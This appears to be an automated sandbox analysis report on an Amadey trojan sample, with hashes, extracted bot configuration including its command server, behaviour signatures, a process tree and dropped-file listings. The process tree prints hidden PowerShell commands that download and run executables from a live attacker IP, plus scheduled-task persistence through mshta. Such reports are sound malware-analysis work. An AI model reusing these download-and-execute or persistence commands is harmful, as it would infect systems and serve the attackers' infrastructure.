Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-02-2025 17:19

General

  • Target

    581073aad7a20307a9d8b1ae25591204.exe

  • Size

    2.1MB

  • MD5

    581073aad7a20307a9d8b1ae25591204

  • SHA1

    7a480497dcbf5a778a67a570507296190879d231

  • SHA256

    10f74f3eb9a3efa714be7afa4503c6655f6502d3891497b96ce4418e0017f0f9

  • SHA512

    0c9fee13c7723ba09449cbec55b88898ece66a53481250d84bd137cf8c972f5a2b3755bedf428595c43077d62fc3377626ee266c432988751f1f056c924d62ab

  • SSDEEP

    49152:Lk9Akf6yHbZTZIR0i+vywkTzn2W+hWr2vI:Lk9FdTZxPaVN+hWivI

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 6 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3488
      • C:\Users\Admin\AppData\Local\Temp\581073aad7a20307a9d8b1ae25591204.exe
        "C:\Users\Admin\AppData\Local\Temp\581073aad7a20307a9d8b1ae25591204.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2348
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3892
          • C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe
            "C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2920
          • C:\Users\Admin\AppData\Local\Temp\1075489001\6881133ff7.exe
            "C:\Users\Admin\AppData\Local\Temp\1075489001\6881133ff7.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2236
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn 2oG7gma1Sbc /tr "mshta C:\Users\Admin\AppData\Local\Temp\TMaNfSmAl.hta" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1148
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn 2oG7gma1Sbc /tr "mshta C:\Users\Admin\AppData\Local\Temp\TMaNfSmAl.hta" /sc minute /mo 25 /ru "Admin" /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3916
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\TMaNfSmAl.hta
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1236
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3HTNNLUMSJU6RPCANSJYJSJ2JG2JK8YS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1440
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd" "
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1476
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd" any_word
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1360
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                6⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:4668
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1108
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3264
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:552
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3008
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3224
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2592
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "hAcztmaxkR3" /tr "mshta \"C:\Temp\1cMRTi6vO.hta\"" /sc minute /mo 25 /ru "Admin" /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:5312
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\1cMRTi6vO.hta"
                6⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5340
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5464
          • C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe
            "C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3120
      • C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe
        "C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:2612
      • C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe
        "C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:5484
      • C:\ProgramData\acfjpea\ftnhdax.exe
        "C:\ProgramData\acfjpea\ftnhdax.exe"
        2⤵
        • Executes dropped EXE
        PID:2572
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:2860
    • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTY5Qjc2OEEtMjJCQy00OTAyLUFGQjEtODJBMEIyNzE1OEE3fSIgdXNlcmlkPSJ7RjJCN0Y1NjQtREI4RS00OUYwLTkwQTEtQjUwMjkyOERCMzg4fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7M0UzQzUwNzUtNEM4My00N0M5LTlBNDgtQkEyNUE2RTc0ODhEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU4NjAiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODIxNjMwOTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MzA4MTc0NzQ5Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
      1⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      PID:3084
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:6128
    • C:\ProgramData\acfjpea\ftnhdax.exe
      C:\ProgramData\acfjpea\ftnhdax.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4156
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:5456
    • C:\ProgramData\acfjpea\ftnhdax.exe
      C:\ProgramData\acfjpea\ftnhdax.exe
      1⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:6012

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Temp\1cMRTi6vO.hta

      Filesize

      782B

      MD5

      16d76e35baeb05bc069a12dce9da83f9

      SHA1

      f419fd74265369666595c7ce7823ef75b40b2768

      SHA256

      456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

      SHA512

      4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      6195a91754effb4df74dbc72cdf4f7a6

      SHA1

      aba262f5726c6d77659fe0d3195e36a85046b427

      SHA256

      3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

      SHA512

      ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Filesize

      53KB

      MD5

      06ad34f9739c5159b4d92d702545bd49

      SHA1

      9152a0d4f153f3f40f7e606be75f81b582ee0c17

      SHA256

      474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

      SHA512

      c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      17KB

      MD5

      00b95344e70ad09d3b51b251cc83478b

      SHA1

      a5d10a73d8017cd205259f892fe735761479b7ad

      SHA256

      124c97024aa674fea3f2f3e6cb9fea9b6c2726acb3bf9674aa3959418b2c08c1

      SHA512

      88a69a7baa7a8be92fac94aba6c7d99b8b89fcf7149e5113d4596f9ccab9ed29bbaad6e91dd124be0ecd867083e5b1933fd1628ab8021ac0b59b829319750439

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      17KB

      MD5

      1039232a5d1c2253e770fee82be6f66f

      SHA1

      5bd903cf3012b31cf7d2f913bc86951eb24d045d

      SHA256

      70992a783f0343a39f6d04e6565f6eb25cb869040c95f968cf94d43116cb6cb7

      SHA512

      a6ea3c6a41974547e1b597500086cc9b0154cf34c7c01d0114541bb9d3563f2540f4a1bf8458fc653ab440f3c03635082290ff92628ae4a8812ebc5eb924656e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      17KB

      MD5

      0a75ef95828e6502bac0d3f4c3fe7d67

      SHA1

      2a0a8c3dc640c758cfa0243cccdc45cee340ccca

      SHA256

      81fa02050925ec9d4203d79c89e84a81d07d75e349dd9b6c22065fa999c80050

      SHA512

      52e9d416e27ac61cc044243aef85d55bbe7f54e382b843325a66fd58228a4b28f7b728eb9f7ce5466a11a274f8f834d2501e957ab9d3cfbcc2a8280d12231c68

    • C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe

      Filesize

      2.3MB

      MD5

      532ae0cc2387d47de8c285b3cfd4dafc

      SHA1

      2f6654c4fe01b3bb8b4b7829ade6cb6bc528be23

      SHA256

      35209605e2bcb1c50dc79aed7428240050c191eb26b704ba373a9e15d75e853e

      SHA512

      824301eb4250ffe96fa06a401b09f9dd01206b82ef7bd0ab6b814f35b599025aadd4f9803424343409e12e6b0d6ae1e27caf4290c55164777558780781d1251e

    • C:\Users\Admin\AppData\Local\Temp\1075489001\6881133ff7.exe

      Filesize

      938KB

      MD5

      b22ba25c5a115656da9e224a62752782

      SHA1

      a26d2e82e8812558e15ea6a8f245dcf23d1a450b

      SHA256

      e60af2cd6c1c46de7f3b5d8ab8a2e43198929f86b9443a66388fbce9ed48ca53

      SHA512

      f77aa45dd57d9016828482a41bda218a90ad7c60712fa9154d928c6630ae923c24114f48fd2992b376abcb86243d7dbe5190753b9d0c6bbe769b9501e867d66f

    • C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd

      Filesize

      2KB

      MD5

      189e4eefd73896e80f64b8ef8f73fef0

      SHA1

      efab18a8e2a33593049775958b05b95b0bb7d8e4

      SHA256

      598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396

      SHA512

      be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

    • C:\Users\Admin\AppData\Local\Temp\1075516001\L5shRfh.exe

      Filesize

      736KB

      MD5

      cd831b1ec4d92a809a08c174c393962f

      SHA1

      8ee33df9414c1c3db1b2c4b0364cf8b993d8413a

      SHA256

      e2ff03ff16e3903fce19b8b2dc658337417cd33fe0ecea82c4a341eab1209c05

      SHA512

      14e4abf8415306b36924705781183adeb6d89cb82d6313daea651532fecbe1dfb777162ddec2a45eebb53ae25ee7cfa5f9a70d4b9298551c5452b7c69663acfd

    • C:\Users\Admin\AppData\Local\Temp\TMaNfSmAl.hta

      Filesize

      726B

      MD5

      924738e099330a8b60f529a65cd416d7

      SHA1

      80c0e89f142791ce8c5875d4c36e3a411f07013b

      SHA256

      c3f26590d6cf27e57f62b682f1919e2ba2b7a2467fee5cef77d3b13b6ccb462c

      SHA512

      e7df5108157650a23b980e04ef1abee44ff59524e79947305b2b483a603e1acdd06b06175e8a84d11d097d29b750607a7ef02db1bfe0a2f2678319826bfa7897

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ite2ipr.xky.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

      Filesize

      2.1MB

      MD5

      581073aad7a20307a9d8b1ae25591204

      SHA1

      7a480497dcbf5a778a67a570507296190879d231

      SHA256

      10f74f3eb9a3efa714be7afa4503c6655f6502d3891497b96ce4418e0017f0f9

      SHA512

      0c9fee13c7723ba09449cbec55b88898ece66a53481250d84bd137cf8c972f5a2b3755bedf428595c43077d62fc3377626ee266c432988751f1f056c924d62ab

    • C:\Windows\Tasks\Test Task17.job

      Filesize

      242B

      MD5

      eec354df5250e5241518d882adca9dd3

      SHA1

      599512694f2f9221dd78a2a2d3c7c21de30a5d44

      SHA256

      4ac0b92d60cb22d8253fa980c1ea53d4c06fbd0970118b576567bc6a677c1762

      SHA512

      332e031d1ff811bb657715dd09ff2d7e573457ad981279b7025c727a2a48abb2686880944577d523a98afcea1ed393727b770e1dd466626fd8692e5aa263b944

    • memory/1440-1404-0x0000000005360000-0x0000000005988000-memory.dmp

      Filesize

      6.2MB

    • memory/1440-1405-0x0000000005210000-0x0000000005232000-memory.dmp

      Filesize

      136KB

    • memory/1440-1407-0x0000000005B70000-0x0000000005BD6000-memory.dmp

      Filesize

      408KB

    • memory/1440-1406-0x0000000005B00000-0x0000000005B66000-memory.dmp

      Filesize

      408KB

    • memory/1440-1413-0x0000000005BE0000-0x0000000005F34000-memory.dmp

      Filesize

      3.3MB

    • memory/1440-1419-0x0000000006210000-0x000000000625C000-memory.dmp

      Filesize

      304KB

    • memory/1440-1433-0x0000000006700000-0x000000000671A000-memory.dmp

      Filesize

      104KB

    • memory/1440-1418-0x00000000061F0000-0x000000000620E000-memory.dmp

      Filesize

      120KB

    • memory/1440-1403-0x0000000004C00000-0x0000000004C36000-memory.dmp

      Filesize

      216KB

    • memory/1440-1432-0x0000000007910000-0x0000000007F8A000-memory.dmp

      Filesize

      6.5MB

    • memory/2348-0-0x0000000000260000-0x000000000074E000-memory.dmp

      Filesize

      4.9MB

    • memory/2348-1-0x0000000077C54000-0x0000000077C56000-memory.dmp

      Filesize

      8KB

    • memory/2348-2-0x0000000000261000-0x00000000002C9000-memory.dmp

      Filesize

      416KB

    • memory/2348-3-0x0000000000260000-0x000000000074E000-memory.dmp

      Filesize

      4.9MB

    • memory/2348-5-0x0000000000260000-0x000000000074E000-memory.dmp

      Filesize

      4.9MB

    • memory/2348-17-0x0000000000260000-0x000000000074E000-memory.dmp

      Filesize

      4.9MB

    • memory/2348-18-0x0000000000261000-0x00000000002C9000-memory.dmp

      Filesize

      416KB

    • memory/2860-30-0x0000000000E11000-0x0000000000E79000-memory.dmp

      Filesize

      416KB

    • memory/2860-31-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/2860-28-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/2860-25-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/2920-53-0x0000000000420000-0x0000000000670000-memory.dmp

      Filesize

      2.3MB

    • memory/2920-1399-0x00000000029F0000-0x0000000002A46000-memory.dmp

      Filesize

      344KB

    • memory/2920-101-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-99-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-97-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-95-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-91-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-89-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-87-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-85-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-84-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-79-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-77-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-75-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-71-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-67-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-65-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-63-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-61-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-59-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-93-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-81-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-58-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-105-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-1398-0x00000000056B0000-0x0000000005708000-memory.dmp

      Filesize

      352KB

    • memory/2920-103-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-1401-0x0000000005710000-0x000000000575C000-memory.dmp

      Filesize

      304KB

    • memory/2920-107-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-109-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-111-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-113-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-115-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-117-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-73-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-69-0x00000000053E0000-0x00000000054D9000-memory.dmp

      Filesize

      996KB

    • memory/2920-57-0x00000000055C0000-0x0000000005652000-memory.dmp

      Filesize

      584KB

    • memory/2920-56-0x0000000005A90000-0x0000000006034000-memory.dmp

      Filesize

      5.6MB

    • memory/2920-55-0x00000000053E0000-0x00000000054DE000-memory.dmp

      Filesize

      1016KB

    • memory/2920-54-0x00000000051B0000-0x00000000053D6000-memory.dmp

      Filesize

      2.1MB

    • memory/2920-2822-0x0000000005780000-0x00000000057D4000-memory.dmp

      Filesize

      336KB

    • memory/3892-32-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/3892-26-0x0000000000E11000-0x0000000000E79000-memory.dmp

      Filesize

      416KB

